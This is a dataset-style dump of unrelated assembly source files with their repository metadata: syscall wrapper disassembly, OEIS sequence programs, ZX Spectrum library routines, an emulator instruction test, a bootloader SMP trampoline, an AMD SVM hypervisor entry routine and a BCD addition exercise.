a0,-100 register long a1 __asm__("a1") = b; 1ed6: 85be mv a1,a5 register long a2 __asm__("a2") = c; 1ed8: 9201 srli a2,a2,0x20 __asm_syscall("r"(a7), "0"(a0), "r"(a1), "r"(a2)) 1eda: 00000073 ecall return syscall(SYS_mkdirat, AT_FDCWD, path, mode); } 1ede: 2501 sext.w a0,a0 1ee0: 8082 ret 0000000000001ee2 <getdents>: register long a7 __asm__("a7") = n; 1ee2: 03d00893 li a7,61 __asm_syscall("r"(a7), "0"(a0), "r"(a1), "r"(a2)) 1ee6: 00000073 ecall int getdents(int fd, struct linux_dirent64 *dirp64, unsigned long len){ //return syscall(SYS_getdents64, fd, dirp64, len); return syscall(SYS_getdents64, fd, dirp64, len); } 1eea: 2501 sext.w a0,a0 1eec: 8082 ret 0000000000001eee <pipe>: register long a7 __asm__("a7") = n; 1eee: 03b00893 li a7,59 register long a1 __asm__("a1") = b; 1ef2: 4581 li a1,0 __asm_syscall("r"(a7), "0"(a0), "r"(a1)) 1ef4: 00000073 ecall int pipe(int fd[2]){ return syscall(SYS_pipe2, fd, 0); } 1ef8: 2501 sext.w a0,a0 1efa: 8082 ret 0000000000001efc <dup>: register long a7 __asm__("a7") = n; 1efc: 48dd li a7,23 __asm_syscall("r"(a7), "0"(a0)) 1efe: 00000073 ecall int dup(int fd){ return syscall(SYS_dup, fd); } 1f02: 2501 sext.w a0,a0 1f04: 8082 ret 0000000000001f06 <dup2>: register long a7 __asm__("a7") = n; 1f06: 48e1 li a7,24 register long a2 __asm__("a2") = c; 1f08: 4601 li a2,0 __asm_syscall("r"(a7), "0"(a0), "r"(a1), "r"(a2)) 1f0a: 00000073 ecall int dup2(int old, int new){ return syscall(SYS_dup3, old, new, 0); } 1f0e: 2501 sext.w a0,a0 1f10: 8082 ret 0000000000001f12 <mount>: register long a7 __asm__("a7") = n; 1f12: 02800893 li a7,40 __asm_syscall("r"(a7), "0"(a0), "r"(a1), "r"(a2), "r"(a3), "r"(a4)) 1f16: 00000073 ecall int mount(const char *special, const char *dir, const char *fstype, unsigned long flags, const void *data) { return syscall(SYS_mount, special, dir, fstype, flags, data); } 1f1a: 2501 sext.w a0,a0 1f1c: 8082 ret 0000000000001f1e <umount>: register long a7 __asm__("a7") = n; 1f1e: 02700893 li a7,39 register long a1 __asm__("a1") = b; 1f22: 4581 li a1,0 __asm_syscall("r"(a7), "0"(a0), "r"(a1)) 1f24: 00000073 ecall int umount(const char *special) { return syscall(SYS_umount2, special, 0); } 1f28: 2501 sext.w a0,a0 1f2a: 8082 ret 0000000000001f2c <__clone>: .global __clone .type __clone, %function __clone: # Save func and arg to stack addi a1, a1, -16 1f2c: 15c1 addi a1,a1,-16 sd a0, 0(a1) 1f2e: e188 sd a0,0(a1) sd a3, 8(a1) 1f30: e594 sd a3,8(a1) # Call SYS_clone mv a0, a2 1f32: 8532 mv a0,a2 mv a2, a4 1f34: 863a mv a2,a4 mv a3, a5 1f36: 86be mv a3,a5 mv a4, a6 1f38: 8742 mv a4,a6 li a7, 220 # SYS_clone 1f3a: 0dc00893 li a7,220 ecall 1f3e: 00000073 ecall beqz a0, 1f 1f42: c111 beqz a0,1f46 <__clone+0x1a> # Parent ret 1f44: 8082 ret # Child 1: ld a1, 0(sp) 1f46: 6582 ld a1,0(sp) ld a0, 8(sp) 1f48: 6522 ld a0,8(sp) jalr a1 1f4a: 9582 jalr a1 # Exit li a7, 93 # SYS_exit 1f4c: 05d00893 li a7,93 ecall 1f50: 00000073 ecall

35.745217

142

0.477413

65823a5a95e4290927be41e076289ce507f3c80c

602

asm

Assembly

oeis/062/A062805.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

11

2021-08-22T19:44:55.000Z

2022-03-20T16:47:57.000Z

oeis/062/A062805.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

9

2021-08-29T13:15:54.000Z

2022-03-09T19:52:31.000Z

oeis/062/A062805.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

3

2021-08-22T20:56:47.000Z

2021-09-29T06:26:12.000Z

; A062805: a(n) = Sum_{i=1..n} i*n^(n-i). ; 0,1,4,18,112,975,11196,160132,2739136,54481005,1234567900,31384283766,884241366768,27342891567355,920521275490012,33512287529147400,1311768467463790336,54933923640889550745,2450641333409472928572,116018436597364068498010,5809285318559556786703600,306735818465264082372509031,17032683224518889484639972604,992253644620871852872243299468,60509751690750130409788195365312,3854941057726237987582054403093125,256094574536617744129141650397448476,17710821275979319213909378737747111102 mov $2,$0 lpb $2 sub $2,1 add $3,1 mul $3,$0 sub $3,$2 lpe mov $0,$3

50.166667

481

0.845515

0aa36445ad5c378485bea30a18fe306ea7f03c99

260

asm

Assembly

programs/oeis/132/A132758.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

22

2018-02-06T19:19:31.000Z

2022-01-17T21:53:31.000Z

programs/oeis/132/A132758.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

41

2021-02-22T19:00:34.000Z

2021-08-28T10:47:47.000Z

programs/oeis/132/A132758.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

5

2021-02-24T21:14:16.000Z

2021-08-09T19:48:05.000Z

; A132758: a(n) = n*(n + 31)/2. ; 0,16,33,51,70,90,111,133,156,180,205,231,258,286,315,345,376,408,441,475,510,546,583,621,660,700,741,783,826,870,915,961,1008,1056,1105,1155,1206,1258,1311,1365,1420,1476,1533,1591,1650 mov $1,$0 add $1,31 mul $0,$1 div $0,2

32.5

187

0.676923

69e37951218d3f023597a4207155163e8bd155eb

349

asm

Assembly

libsrc/_DEVELOPMENT/target/zx/driver/terminal/zx_01_output_fzx_tty_z88dk/zx_01_output_fzx_tty_z88dk_17_paper.asm

meesokim/z88dk

5763c7778f19a71d936b3200374059d267066bb2

[ "ClArtistic" ]

null

libsrc/_DEVELOPMENT/target/zx/driver/terminal/zx_01_output_fzx_tty_z88dk/zx_01_output_fzx_tty_z88dk_17_paper.asm

meesokim/z88dk

5763c7778f19a71d936b3200374059d267066bb2

[ "ClArtistic" ]

null

libsrc/_DEVELOPMENT/target/zx/driver/terminal/zx_01_output_fzx_tty_z88dk/zx_01_output_fzx_tty_z88dk_17_paper.asm

meesokim/z88dk

5763c7778f19a71d936b3200374059d267066bb2

[ "ClArtistic" ]

null

SECTION code_fcntl PUBLIC zx_01_output_fzx_tty_z88dk_17_paper zx_01_output_fzx_tty_z88dk_17_paper: ; change paper of foreground colour ; de = parameters * ld a,(de) and $07 add a,a add a,a add a,a ld e,a ld a,(ix+52) ; a = foreground colour and $c3 or e ld (ix+52),a ret

13.423077

54

0.587393

5dcdf80694628a44b2b094197b27ed9b00d2c8c6

1,041

asm

Assembly

unittests/ASM/TwoByte/0F_E3.asm

cobalt2727/FEX

13087f8425aeaad28dc81bed46a83e1d72ff0db8

[ "MIT" ]

628

2020-03-06T14:01:32.000Z

2022-03-31T06:35:14.000Z

unittests/ASM/TwoByte/0F_E3.asm

cobalt2727/FEX

13087f8425aeaad28dc81bed46a83e1d72ff0db8

[ "MIT" ]

576

2020-03-06T08:25:12.000Z

2022-03-30T04:05:29.000Z

unittests/ASM/TwoByte/0F_E3.asm

cobalt2727/FEX

13087f8425aeaad28dc81bed46a83e1d72ff0db8

[ "MIT" ]

38

2020-03-07T06:10:00.000Z

2022-03-29T09:27:36.000Z

%ifdef CONFIG { "RegData": { "MM0": "0x20f9b0697cd37844", "MM1": "0x1ed685b8691d35ca", "MM2": "0x15dc41a91ea818cc", "MM3": "0x20f9b0697cd37844", "MM4": "0x1ed685b8691d35ca", "MM5": "0x15dc41a91ea818cc" }, "MemoryRegions": { "0x100000000": "4096" } } %endif mov rdx, 0xe0000000 mov rax, 0x2bb883523d4f3197 mov [rdx + 8 * 0], rax mov rax, 0x1246c77764260189 mov [rdx + 8 * 1], rax mov rax, 0x163add80bc57bef1 mov [rdx + 8 * 2], rax mov rax, 0x64d615e5b405a306 mov [rdx + 8 * 3], rax mov rax, 0x11f4881d94eb39fc mov [rdx + 8 * 4], rax mov rax, 0xa9162248f2d0a23a mov [rdx + 8 * 5], rax mov rax, 0x0 mov [rdx + 8 * 6], rax mov rax, 0x0 mov [rdx + 8 * 7], rax movq mm0, [rdx + 8 * 0] movq mm1, [rdx + 8 * 0] movq mm2, [rdx + 8 * 0] movq mm3, [rdx + 8 * 0] movq mm4, [rdx + 8 * 0] movq mm5, [rdx + 8 * 0] movq mm6, [rdx + 8 * 2] movq mm7, [rdx + 8 * 4] pavgw mm0, mm6 pavgw mm1, mm7 movq mm7, [rdx + 8 * 6] pavgw mm2, mm7 pavgw mm3, [rdx + 8 * 2] pavgw mm4, [rdx + 8 * 4] pavgw mm5, [rdx + 8 * 6] hlt

17.644068

32

0.601345

fea39683dff9968438d72cf9b5f91cedcf2afd7f

5,740

nasm

Assembly

src/loaders/stivale2/smp.nasm

Matt8898/TomatBoot-UEFI

3578597318bd094048676dab6727b4d2d35a8445

[ "BSD-2-Clause" ]

88

2020-11-14T19:55:49.000Z

2022-02-28T06:49:50.000Z

src/loaders/stivale2/smp.nasm

kretlim/kretlim-uefi-boot

4c4a49a884e15bdb9cb9fb26fcadc6bc4f6852c2

[ "BSD-2-Clause" ]

10

2019-12-01T21:28:59.000Z

2020-11-13T14:28:45.000Z

src/loaders/stivale2/smp.nasm

kretlim/kretlim-uefi-boot

4c4a49a884e15bdb9cb9fb26fcadc6bc4f6852c2

[ "BSD-2-Clause" ]

11

2019-12-02T18:47:19.000Z

2020-11-03T12:10:07.000Z

[SECTION .data] [GLOBAL gSmpTrampoline] gSmpTrampoline: [BITS 16] ; At this point CS = 0x(vv00) and ip= 0x0. ; clear everything cli cld ; set the gdt mov si, gSmpTplGdt - gSmpTrampoline o32 lgdt [cs:si] ; calculate our physical address ((.mode32 - base) + cs * 16) mov edi, .mode32 - gSmpTrampoline mov ax, cs shl eax, 4 add edi, eax ; set it in the buffer mov si, gMode32Addr - gSmpTrampoline mov [cs:si], edi ; enter protected mode mov eax, cr0 bts eax, 0 mov cr0, eax ; jump to it jmp far [cs:si] [BITS 32] ; set all the segment registers .mode32: mov ax, 0x20 mov ds, ax mov es, ax mov fs, ax mov gs, ax mov ss, ax mov eax, cr0 btr eax, 29 btr eax, 30 mov cr0, eax ; check if we need to enable x2apic test dword [gSmpTplTargetMode], (1 << 2) jz .nox2apic ; configure x2apic mov ecx, 0x1b rdmsr bts eax, 10 bts eax, 11 wrmsr .nox2apic: ; mov eax, cr4 bts eax, 5 mov cr4, eax ; check for 5 level paging test dword [gSmpTplTargetMode], (1 << 1) jz .no5lv ; enable 5 level paging mov eax, cr4 bts eax, 12 mov cr4, eax .no5lv: ; set the pagetable mov eax, dword [gSmpTplPagemap] mov cr3, eax ; enable long mode mov ecx, 0xc0000080 rdmsr bts eax, 8 wrmsr ; enable paging mov eax, cr0 bts eax, 31 mov cr0, eax ; actually enter long mode jmp 0x28:.mode64 [BITS 64] .mode64: ; set the data segments mov ax, 0x30 mov ds, ax mov es, ax mov fs, ax mov gs, ax mov ss, ax ; load the info struct and set the booted flag mov rdi, qword [rel gSmpTplInfoStruct] mov eax, 1 lock xchg dword [rel gSmpTplBootedFlag], eax xor eax, eax .loop: ; check if the flag was set lock xadd qword [rdi + 16], rax test rax, rax jnz .out ; no, pause and jump ; back to loop pause jmp .loop .out: mov rsp, qword [rdi + 8] push 0 push rax xor rax, rax xor rbx, rbx xor rcx, rcx xor rdx, rdx xor rsi, rsi xor rbp, rbp xor r8, r8 xor r9, r9 xor r10, r10 xor r11, r11 xor r12, r12 xor r13, r13 xor r14, r14 xor r15, r15 ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; These variables are accessed with relative addressing ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; gMode32Addr: dd 0x0000 dw 24 [GLOBAL gSmpTplBootedFlag] gSmpTplBootedFlag: dd 0 [GLOBAL gSmpTplInfoStruct] gSmpTplInfoStruct: dq 0 [GLOBAL gSmpTplGdt] gSmpTplGdt: dw 0 dd 0 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; [GLOBAL gSmpTrampolineEnd] gSmpTrampolineEnd: ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; these variables are accessed with abs addresses ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; [GLOBAL gSmpTplTargetMode] gSmpTplTargetMode: dd 0 [GLOBAL gSmpTplPagemap] gSmpTplPagemap: dd 0 [GLOBAL gGdtPtr] gGdtPtr: dw .size - 1 ; GDT size dd .start ; GDT start address .start: ; Null desc dq 0 ; 16-bit code dw 0xffff ; Limit dw 0x0000 ; Base (low 16 bits) db 0x00 ; Base (mid 8 bits) db 10011010b ; Access db 00000000b ; Granularity db 0x00 ; Base (high 8 bits) ; 16-bit data dw 0xffff ; Limit dw 0x0000 ; Base (low 16 bits) db 0x00 ; Base (mid 8 bits) db 10010010b ; Access db 00000000b ; Granularity db 0x00 ; Base (high 8 bits) ; 32-bit code dw 0xffff ; Limit dw 0x0000 ; Base (low 16 bits) db 0x00 ; Base (mid 8 bits) db 10011010b ; Access db 11001111b ; Granularity db 0x00 ; Base (high 8 bits) ; 32-bit data dw 0xffff ; Limit dw 0x0000 ; Base (low 16 bits) db 0x00 ; Base (mid 8 bits) db 10010010b ; Access db 11001111b ; Granularity db 0x00 ; Base (high 8 bits) ; 64-bit code dw 0x0000 ; Limit dw 0x0000 ; Base (low 16 bits) db 0x00 ; Base (mid 8 bits) db 10011010b ; Access db 00100000b ; Granularity db 0x00 ; Base (high 8 bits) ; 64-bit data dw 0x0000 ; Limit dw 0x0000 ; Base (low 16 bits) db 0x00 ; Base (mid 8 bits) db 10010010b ; Access db 00000000b ; Granularity db 0x00 ; Base (high 8 bits) .end: .size: equ .end - .start

24.016736

121

0.433624

c838d319fd971eb513219157c2ca737ba39d5a98

595

asm

Assembly

libsrc/_DEVELOPMENT/arch/zxn/memory/z80/asm_zxn_mmu_from_addr.asm

jpoikela/z88dk

7108b2d7e3a98a77de99b30c9a7c9199da9c75cb

[ "ClArtistic" ]

640

2017-01-14T23:33:45.000Z

2022-03-30T11:28:42.000Z

libsrc/_DEVELOPMENT/arch/zxn/memory/z80/asm_zxn_mmu_from_addr.asm

jpoikela/z88dk

7108b2d7e3a98a77de99b30c9a7c9199da9c75cb

[ "ClArtistic" ]

1,600

2017-01-15T16:12:02.000Z

2022-03-31T12:11:12.000Z

libsrc/_DEVELOPMENT/arch/zxn/memory/z80/asm_zxn_mmu_from_addr.asm

jpoikela/z88dk

7108b2d7e3a98a77de99b30c9a7c9199da9c75cb

[ "ClArtistic" ]

215

2017-01-17T10:43:03.000Z

2022-03-23T17:25:02.000Z

; =============================================================== ; 2017 ; =============================================================== ; ; unsigned char zxn_mmu_from_addr(unsigned int addr) ; ; =============================================================== SECTION code_clib SECTION code_arch PUBLIC asm_zxn_mmu_from_addr asm_zxn_mmu_from_addr: ; return mmu slot the address belongs to ; ; enter : hl = unsigned int addr ; ; exit : a = l = mmu slot 0-7 ; ; uses : af, hl ld a,h rlca rlca rlca and $07 ld l,a IF __SCCZ80 ld h,0 ENDIF ret

17.5

65

0.423529

c45288ff86e9591faa5f97173cc698725b279c0c

2,349

nasm

Assembly

AmdIntelEmu/Runtime/X64/EnableVM.nasm

mhaeuser/AmdXnuSupportPkg

2e539341cca22f791bad69fc0ba8a413ba1bb75a

[ "BSD-3-Clause" ]

23

2020-12-13T12:23:49.000Z

2022-03-26T14:30:51.000Z

AmdIntelEmu/Runtime/X64/EnableVM.nasm

somestupidgirl/AmdXnuSupportPkg

a627a6a03788a05c684eb6a32ff0dfdca236e314

[ "BSD-3-Clause" ]

null

AmdIntelEmu/Runtime/X64/EnableVM.nasm

somestupidgirl/AmdXnuSupportPkg

a627a6a03788a05c684eb6a32ff0dfdca236e314

[ "BSD-3-Clause" ]

8

2020-12-13T11:41:49.000Z

2022-02-13T03:24:18.000Z

%define AMD_VMCB_EXITCODE_OFFSET (0x70) %define AMD_VMCB_RIP_OFFSET (0x400 + 0x0178) %define AMD_VMCB_RSP_OFFSET (0x400 + 0x01D8) #include "AmdIntelEmu.h" extern ASM_PFX (AmdIntelEmuInternalInterceptionHandler) DEFAULT REL SECTION .text global ASM_PFX (AmdIntelEmuInternalVmrun) ASM_PFX (AmdIntelEmuInternalVmrun): ; ; Save the caller stack to return transparently later. ; pop rax mov [rcx + AMD_VMCB_RIP_OFFSET], rax mov [rcx + AMD_VMCB_RSP_OFFSET], rsp mov rsp, rdx ; Set up the new host stack. ; ; Software must load RAX (EAX in 32-bit mode) with the physical address of ; the VMCB, a 4-Kbyte-aligned page that describes a virtual machine to be ; executed. ; mov rax, rcx .StartGuest: vmrun ; ; The INIT procedure sets EFER to 0, which means EFER.SVME zero'd. ; As this causes undefined behavior during guest runtime, all INITs are ; intercepted and taken on host level. STGI is called to release the ; pending INIT. This sequence is machine code to minimize delays. ; cmp qword [rax + AMD_VMCB_EXITCODE_OFFSET], VMEXIT_INIT jnz .InterceptionHandler stgi .HltLoop: cli hlt jmp .HltLoop .InterceptionHandler: ; ; Interception handling code. ; ; rsp and rax are saved in VMCB. rbp, rsi, rdi, r12 to r15 and xmm6 to xmm15 ; are non-volatile (EFIAPI). ; C code assumes the "rbx, rcx, rdx" layout. ; push r11 push r10 push r9 push r8 push rdx push rcx push rbx ; non-volatile for EFIAPI, but C code may access it. mov rdx, rsp ; Pass the registers' addresses. sub rsp, 0x88 ; shadow area (4 * 8 bytes) and XMM registers (aligned). movaps [rsp + 0x20], xmm0 movaps [rsp + 0x30], xmm1 movaps [rsp + 0x40], xmm2 movaps [rsp + 0x50], xmm3 movaps [rsp + 0x60], xmm4 movaps [rsp + 0x70], xmm5 mov rcx, rax ; Pass the VMCB. call ASM_PFX (AmdIntelEmuInternalInterceptionHandler) movaps xmm5, [rsp + 0x70] movaps xmm4, [rsp + 0x60] movaps xmm3, [rsp + 0x50] movaps xmm2, [rsp + 0x40] movaps xmm1, [rsp + 0x30] movaps xmm0, [rsp + 0x20] add rsp, 0x88 pop rbx pop rcx pop rdx pop r8 pop r9 pop r10 pop r11 jmp .StartGuest ; Unconditionally resume the guest.

27.313953

79

0.653895

7a96e96569bba0b4c4cbb7589f8d9fed79597ff9

494

asm

Assembly

programs/oeis/022/A022339.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

22

2018-02-06T19:19:31.000Z

2022-01-17T21:53:31.000Z

programs/oeis/022/A022339.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

41

2021-02-22T19:00:34.000Z

2021-08-28T10:47:47.000Z

programs/oeis/022/A022339.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

5

2021-02-24T21:14:16.000Z

2021-08-09T19:48:05.000Z

; A022339: Index of 3^n within sequence of numbers of form 3^i*5^j. ; 1,2,4,7,10,14,19,24,30,37,44,52,61,70,80,91,102,114,127,140,154,169,185,201,218,236,254,273,293,313,334,356,378,401,425,449,474,500,526,553,581,609,638,668,699,730,762,795,828,862,897,932,968,1005,1042,1080,1119 mov $3,$0 mov $5,$0 add $5,1 lpb $5 mov $0,$3 sub $5,1 sub $0,$5 mul $0,6 add $4,1 add $0,$4 mul $0,2 mov $2,3 sub $2,$4 sub $0,$2 mul $0,2 div $0,44 add $0,1 add $1,$0 lpe mov $0,$1

20.583333

213

0.611336

3197bffcdea804a3cee781a69d649fd94fc36d9c

8,467

asm

Assembly

Codes/Chapter11/P06/P11-06.asm

ar-ekt/Dandamudi-Assembly-Solutions

876097a20420b125b19ec9e71cc480cc08b47997

[ "MIT" ]

8

2021-03-04T18:31:42.000Z

2021-11-03T04:41:25.000Z

Codes/Chapter11/P06/P11-06.asm

ar-ekt/Dandamudi-Assembly-Solutions

876097a20420b125b19ec9e71cc480cc08b47997

[ "MIT" ]

null

Codes/Chapter11/P06/P11-06.asm

ar-ekt/Dandamudi-Assembly-Solutions

876097a20420b125b19ec9e71cc480cc08b47997

[ "MIT" ]

1

2021-11-09T09:49:00.000Z

global _start extern ExitProcess %include "lib.h" section .data MAX_NUMBER_LENGTH EQU 100 NULL EQU 0 nwln db 10, NULL inMSG1 db "enter the first number: ", NULL inMSG2 db "enter the second number: ", NULL outMSG db "The sum is: ", NULL section .bss buffer resb MAX_NUMBER_LENGTH number1 resb MAX_NUMBER_LENGTH number2 resb MAX_NUMBER_LENGTH BCDsum resb MAX_NUMBER_LENGTH ASCIIsum resb MAX_NUMBER_LENGTH section .code _start: puts inMSG1 fgets number1, MAX_NUMBER_LENGTH puts inMSG2 fgets number2, MAX_NUMBER_LENGTH push number1 push number2 call fix_length ; equalize the length of two numbers by adding zero to the left of the smaller number push EAX push number1 call ASCII_to_BCD ; convert first number to packed decimal number push EAX push number2 call ASCII_to_BCD ; convert second number to packed decimal number mov EBX, EAX ; save length of result mov ECX, EAX ; loop iteration count shr ECX, 1 mov ESI, ECX ; ESI is used as index into number1, number2 and ASCIIsum dec ESI clc ; clear carry (we use ADC) add_loop: mov AL,[number1+ESI] adc AL,[number2+ESI] daa ; ASCII adjust mov [BCDsum+ESI],AL ; store the sum byte dec ESI ; update index loop add_loop jnc no_carry mov EAX, 1 jmp output_result no_carry: xor EAX, EAX output_result: push EDX push EAX push EBX call BCD_to_ASCII puts outMSG ; display sum puts ASCIIsum puts nwln _end: push 0 call ExitProcess ;----------------------------------------------------------- ; Converts ASCII to packed decimal number ;----------------------------------------------------------- ASCII_to_BCD: %define number DWORD [EBP+8] %define length DWORD [EBP+12] enter 0, 0 pushad mov ESI, number ; copy number pointer to ESI (ASCII mode) mov EDI, number ; copy number pointer to EDI (BCD mode) mov ECX, length ; loop counter shr ECX, 1 ASCII_to_BCD_loop: mov AH, [ESI] ; first ASCII digit inc ESI ; update ESI mov AL, [ESI] ; second ASCII digit and AL, 0Fh ; converts digits to BCD digit shl AH, 4 or AL, AH mov [EDI], AL ; BCD digit inc ESI ; update ESI inc EDI ; update EDI loop ASCII_to_BCD_loop mov [EDI], BYTE NULL ; terminate number ASCII_to_BCD_done: popad leave ret 8 ;----------------------------------------------------------- ; Converts the packed decimal number in BCDsum ; to ASCII represenation and stores it in ASCIIsum. ; All registers are preserved. ;----------------------------------------------------------- BCD_to_ASCII: %define length DWORD [EBP+8] %define carry DWORD [EBP+12] %define bothNumberStartWithZero DWORD [EBP+16] enter 0,0 pushad ; save registers mov ESI,length ; ESI is used as index into ASCIIsum dec ESI mov ECX,length ; loop count ( of BCD digits) shr ECX,1 mov EDI,ECX ; EDI is used as index into BCDsum dec EDI cnv_loop: mov AL,[BCDsum+EDI] ; AL = BCD digit mov AH,AL ; save the BCD digit ; convert right digit to ASCII & store in ASCIIsum and AL,0FH or AL,30H mov [ASCIIsum+ESI],AL dec ESI mov AL,AH ; restore the BCD digit ; convert left digit to ASCII & store in ASCIIsum shr AL,4 ; right-shift by 4 positions or AL,30H mov [ASCIIsum+ESI],AL dec ESI dec EDI ; update EDI loop cnv_loop xor ESI, ESI ; ESI is used as index into ASCIIsum mov ECX, length ; loop counter cmp bothNumberStartWithZero, 0 je BCD_to_ASCII_continue ; if both numbers don't start with zero so the leading zero is cause of carry of most right digits and shouldn't be removed cmp [ASCIIsum], BYTE "0" ; otherwise the first leading zero should be removed je BCD_to_ASCII_removeZero jmp BCD_to_ASCII_continue BCD_to_ASCII_removeZero: ; shift other digits to left mov AL, [ASCIIsum+ESI+1] mov [ASCIIsum+ESI], AL inc ESI loop BCD_to_ASCII_removeZero dec length ; decrease length of ASCIIsum BCD_to_ASCII_continue: cmp carry, 1 ; if carry equals to 1 add 1 to start of ASCIIsum jne BCD_to_ASCII_done mov ECX, length ; loop counter mov ESI, length ; ESI is used as index into ASCIIsum BCD_to_ASCII_addCarry: ; shifts the ASCIIsum characters to the right mov AL, [ASCIIsum+ESI-1] mov [ASCIIsum+ESI], AL dec ESI loop BCD_to_ASCII_addCarry mov [ASCIIsum], BYTE "1" ; add 1 to start of ASCIIsum BCD_to_ASCII_done: popad ; restore registers leave ret 12 ;-------------------------------------------------------------------------- ; increase the length of the smaller number to the length ; of the larger number by adding zero to its left and ; return length of the bigger number in EAX ; and return 1 in EDX if both numbers start with zero otherwise set it 0 ;-------------------------------------------------------------------------- fix_length: %define number1 DWORD [EBP+8] %define number2 DWORD [EBP+12] enter 0, 0 push EBX push ECX push ESI push number1 call strlen mov ECX, EAX ; length of number1 push number2 call strlen mov EBX, EAX ; length of number2 ; EAX = max(strlen(number1), strlen(number2)) cmp ECX, EBX jge fix_length_num1_bigger jmp fix_length_num2_bigger fix_length_num1_bigger: mov EAX, ECX jmp fix_length_addZero fix_length_num2_bigger: mov EAX, EBX jmp fix_length_addZero fix_length_addZero: mov DL, AL and DL, 1H add AL, DL ; if maximum length is odd, add one to the length push EAX push ECX push number1 call addZero ; add zero to the left of number1 push EAX push EBX push number2 call addZero ; add zero to the left of number2 xor EDX, EDX mov ESI, number1 cmp [ESI], BYTE "0" jne fix_length_done mov ESI, number2 cmp [ESI], BYTE "0" jne fix_length_done mov EDX, 1 ; both numbers start with zero fix_length_done: pop ESI pop ECX pop EBX leave ret 8 ;---------------------------------------------------------------- ; add zero to the left of number until its length reaches len2 ;---------------------------------------------------------------- addZero: %define number DWORD [EBP+8] %define len1 DWORD [EBP+12] %define len2 DWORD [EBP+16] enter 0, 0 pushad mov ESI, buffer ; copy buffer pointer to ESI mov ECX, len2 ; number of zeros = len2 - len1 sub ECX, len1 cmp ECX, 0 je addZero_done addZero_zeroLoop: ; first add zeros to the buffer mov [ESI], BYTE "0" inc ESI ; next position loop addZero_zeroLoop mov EDI, number ; copy number pointer to EDI mov ECX, len1 addZero_movLoop: ; contact number to the end of buffer mov AL, [EDI] mov [ESI], AL inc ESI inc EDI loop addZero_movLoop mov EDI, buffer mov ESI, number mov ECX, len2 addZero_copyLoop: ; copy buffer to number mov AL, [EDI] mov [ESI], AL inc ESI inc EDI loop addZero_copyLoop mov [ESI], BYTE NULL ; terminate the number string addZero_done: popad leave ret 12 ;------------------------------- ; return length of string in EAX ;------------------------------- strlen: %define string DWORD [EBP+8] enter 0, 0 push ESI mov ESI, string ; copy string pointer to ESI xor EAX, EAX ; save the length strlen_loop: cmp [ESI+EAX], BYTE NULL ; end of string je strlen_done inc EAX jmp strlen_loop strlen_done: pop ESI leave ret 4

31.128676

158

0.56171

520bdec882a6c60dbe3a3151a1dc8815a8ad1c3f

444

asm

Assembly

oeis/028/A028099.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

11

2021-08-22T19:44:55.000Z

2022-03-20T16:47:57.000Z

oeis/028/A028099.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

9

2021-08-29T13:15:54.000Z

2022-03-09T19:52:31.000Z

oeis/028/A028099.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

3

2021-08-22T20:56:47.000Z

2021-09-29T06:26:12.000Z

; A028099: Expansion of 1/((1 - 3*x)*(1 - 8*x)*(1 - 9*x)*(1 - 10*x)). ; Submitted by Jon Maiga ; 1,30,577,9066,126829,1646094,20280169,240528882,2771673157,31228927158,345616983361,3769863028698,40631819886685,433596513609822,4588506840332953,48214238728174914,503555280142266613 mov $1,1 mov $2,$0 mov $3,$0 lpb $2 mov $0,$3 sub $2,1 sub $0,$2 seq $0,18069 ; Expansion of 1/((1-3x)(1-8x)(1-10x)). mul $1,9 add $1,$0 lpe mov $0,$1

26.117647

184

0.675676

3fde8fa66e0442b094bd98ffba880adf42ced11c

18,711

asm

Assembly

src/objects.asm

fjpena/sword-of-ianna-zx

